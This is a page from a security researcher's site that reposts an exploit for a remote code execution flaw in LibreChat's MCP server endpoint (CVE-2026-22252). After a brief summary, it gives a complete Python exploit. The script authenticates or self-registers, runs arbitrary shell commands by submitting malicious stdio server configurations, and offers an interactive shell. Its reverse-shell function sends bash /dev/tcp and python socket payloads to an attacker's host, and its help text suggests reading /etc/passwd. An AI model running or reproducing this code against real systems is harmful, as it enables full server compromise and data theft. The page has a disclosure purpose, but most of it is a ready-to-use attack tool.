Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

LibreChat MCP 0.8.2-rc2 Remote Code Execution
LibreChat MCP 0.8.2-rc2 Remote Code Execution
LibreChat MCP 0.8.2-rc2 Remote Code Execution

=============================================================================================================================================
| # Title LibreChat MCP 0.8.2-rc2 Remote Code Execution

=============================================================================================================================================
| # Title : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252

[+] Summary : A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat?s Model Context Protocol (MCP) server management functionality.
The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.
An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes
arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without
proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.
Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence,
and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments
[+] POC :

#!/usr/bin/env python3

import requests
import json
import sys
import re
import time
import argparse
import signal
import logging
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
from urllib.parse import urljoin

logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

class TransportType(Enum):

STDIO = "stdio"
SSE = "sse"
HTTP = "http"

@dataclass
class AuthResult:

success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
message: str = ""

class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout

self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})

self.auth_result = AuthResult(success=False)
self.csrf_token = None

def _extract_csrf_token(self, response_text: str) -> Optional[str]:

patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]

for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)

if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')

return None

def _get_base_endpoints(self) -> Dict[str, str]:

try:

health_check = self.session.get(
f"{self.target_url}/health",
timeout=self.timeout
)

for endpoint in ['/api', '/api/v1', '/api/v2']:
try:
response = self.session.get(
f"{self.target_url}{endpoint}",
timeout=self.timeout,
allow_redirects=False
)
if response.status_code < 400:
logger.info(f"Found API interface at: {endpoint}")
break
except:
continue

except Exception as e:
logger.debug(f"System check failed: {e}")

return {
'register': '/api/auth/register',
'login': '/api/auth/login',
'mcp_servers': '/api/mcp/servers',
'user_info': '/api/auth/me',
}

def check_target(self) -> Tuple[bool, str, Optional[str]]:

try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)

if response.status_code != 200:
return False, "Server unavailable", None

html_content = response.text
indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken']

is_librechat = any(indicator in html_content for indicator in indicators)

if not is_librechat:
return False, "This may not be a LibreChat server", None

version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
]

version = None
for pattern in version_patterns:
match = re.search(pattern, html_content)
if match:
version = match.group(1)
break

self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})

return True, "LibreChat confirmed", version

except requests.RequestException as e:
return False, f"Connection error: {e}", None

def register_user(self, username: str, password: str, email: str) -> bool:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['register'])

headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

payload = {
"name": username[:50],
"email": email[:100],
"password": password,
"confirm_password": password,
"username": username[:30]
}

try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)

logger.debug(f"Registration response: {response.status_code}")

if response.status_code in [200, 201, 302]:
logger.info(f"[?] User registered: {username}")

if 'csrf' in response.text.lower():
self.csrf_token = self._extract_csrf_token(response.text)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
return True
else:
logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}")
return False

except Exception as e:
logger.error(f"Error during registration: {e}")
return False

def login(self, email: str, password: str) -> AuthResult:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['login'])

headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

payload = {"email": email, "password": password}

try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True
)

logger.debug(f"Login response: {response.status_code}")

if response.status_code in [200, 201, 302]:

token = None
try:
data = response.json()
token = data.get('token') or data.get('accessToken') or data.get('authToken')
except:
pass

cookies = dict(self.session.cookies) if self.session.cookies else {}

new_csrf = self._extract_csrf_token(response.text)
if new_csrf:
self.csrf_token = new_csrf
self.session.headers.update({'X-CSRF-Token': self.csrf_token})

auth_valid = self._verify_authentication()

self.auth_result = AuthResult(
success=auth_valid,
token=token,
cookies=cookies,
csrf_token=self.csrf_token,
message="Login successful" if auth_valid else "Authentication invalid"
)

if auth_valid:
logger.info("[?] Login and authentication successful")
else:
logger.warning("[!] Login succeeded but session is invalid")

return self.auth_result
else:
error_msg = f"Login failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:100]}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)

except Exception as e:
error_msg = f"Login error: {e}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)

def _verify_authentication(self) -> bool:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['user_info'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
user_data = response.json()
return bool(user_data.get('username') or user_data.get('email'))
except:
pass
return False

def check_mcp_endpoint(self) -> Tuple[bool, str]:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 401:
return False, "Authentication required"
elif response.status_code == 403:
return False, "Forbidden - Might require Admin privileges"
elif response.status_code == 404:
return False, "Not Found - Version mismatch"
elif response.status_code == 200:
return True, "Available"
else:
return False, f"Unknown status: {response.status_code}"
except Exception as e:
return False, f"Connection error: {e}"

def execute_command(self, command: str, shell_path: str = None) -> Tuple[bool, str]:

if not self.auth_result.success:
return False, "Unauthorized"

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])

shell_path = shell_path or '/bin/sh'

safe_command = f"({command}) 2>&1"

payload = {
"config": {
"type": "stdio",
"title": f"server_{int(time.time())}",
"command": shell_path,
"args": ["-c", safe_command]
}
}

headers = {"Content-Type": "application/json"}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

try:
logger.info(f"Sending command to: {url}")
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)

if response.status_code in [200, 201]:
try:
data = response.json()
error = data.get('error') or data.get('message', '')
if error and 'fail' in error.lower():
return False, f"Server rejected: {error}"
except:
pass
return True, "Command sent"
else:
return False, f"Execution failed: {response.status_code} - {response.text[:200]}"

except requests.Timeout:
return False, "Timeout - Command might be running"
except Exception as e:
return False, f"Error: {e}"

def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:

test_file = f"/tmp/librechat_test_{int(time.time())}.txt"
test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1"

success, message = self.execute_command(test_command)

if success:

return True, "Vulnerability likely exists (Command sent)", None
else:
return False, f"Vulnerability not found: {message}", None

class InteractiveShell:

def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)

def signal_handler(self, signum, frame):
logger.info("\n[!] Shutdown signal received...")
self.running = False

def run(self):

print("\n" + "="*60)
print("Interactive Mode - Type 'help' for menu")
print("Type 'exit' to quit")
print("="*60)

command_history = []
rate_limit = 1
last_command_time = 0

while self.running:
try:
current_time = time.time()
if current_time - last_command_time < rate_limit:
time.sleep(rate_limit - (current_time - last_command_time))

try:
cmd = input("\nexploit> ").strip()
except EOFError:
break
except KeyboardInterrupt:
continue

if not cmd: continue

last_command_time = time.time()
command_history.append(cmd)

if cmd.lower() == 'exit': break
elif cmd.lower() == 'help': self.show_help()
elif cmd.lower() == 'history':
for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}")
elif cmd.lower() == 'status':
print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}")
print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}")
elif cmd.lower().startswith('shell'):
self.handle_reverse_shell(cmd)
else:
success, message = self.exploit.execute_command(cmd)
print(f"[{'?' if success else '?'}] {message}")
except Exception as e:
logger.error(f"Shell error: {e}")
time.sleep(1)

def show_help(self):
print("""
Commands:
exit - Exit
help - Show this menu
history - Show last 10 commands
status - Auth status
shell [LHOST] [LPORT] - Spawn reverse shell

Examples: id, pwd, ls -la, cat /etc/passwd
""")

def handle_reverse_shell(self, cmd: str):
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return

lhost, lport = parts[1], parts[2]
print(f"[*] Preparing reverse shell to {lhost}:{lport}")

shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
]

for i, s_cmd in enumerate(shells, 1):
print(f"[*] Attempting shell #{i}...")
success, message = self.exploit.execute_command(s_cmd)
if success:
print("[?] Shell sent. Check your listener.")
break

def main():
parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-c', '--command', help='Command to execute')
parser.add_argument('--test', action='store_true', help='Test vulnerability')
parser.add_argument('--interactive', action='store_true', help='Interactive mode')
parser.add_argument('--username', default='test_user')
parser.add_argument('--password', default='Test12345!')
parser.add_argument('--email', default='This email address is being protected from spambots. You need JavaScript enabled to view it.')
parser.add_argument('--timeout', type=int, default=30)
parser.add_argument('--verbose', '-v', action='store_true')

args = parser.parse_args()
if args.verbose: logging.getLogger().setLevel(logging.DEBUG)

print("="*60)
print("LibreChat MCP RCE Exploit - Enhanced")
print("CVE-2026-22252")
print("="*60)

exploit = LibreChatExploit(args.url, args.timeout)

print("[*] Checking target system...")
ok, msg, ver = exploit.check_target()
if not ok:
print(f"[?] {msg}")
sys.exit(1)

print(f"[?] {msg} (Version: {ver or 'Unknown'})")

print(f"\n[*] Authenticating as {args.username}...")
auth = exploit.login(args.email, args.password)

if not auth.success:
print("[*] Attempting registration...")
if exploit.register_user(args.username, args.password, args.email):
auth = exploit.login(args.email, args.password)

if not auth.success:
print(f"[?] Authentication failed: {auth.message}")
sys.exit(1)

print("[?] Authentication successful")

if args.test:
vuln, msg, out = exploit.test_vulnerability()
print(f"\n[{'?' if vuln else '?'}] {msg}")
elif args.command:
success, msg = exploit.execute_command(args.command)
print(f"[{'?' if success else '?'}] {msg}")
elif args.interactive:
shell = InteractiveShell(exploit)
shell.run()

if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[*] Interrupted by user")
sys.exit(0)

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

Social Media Share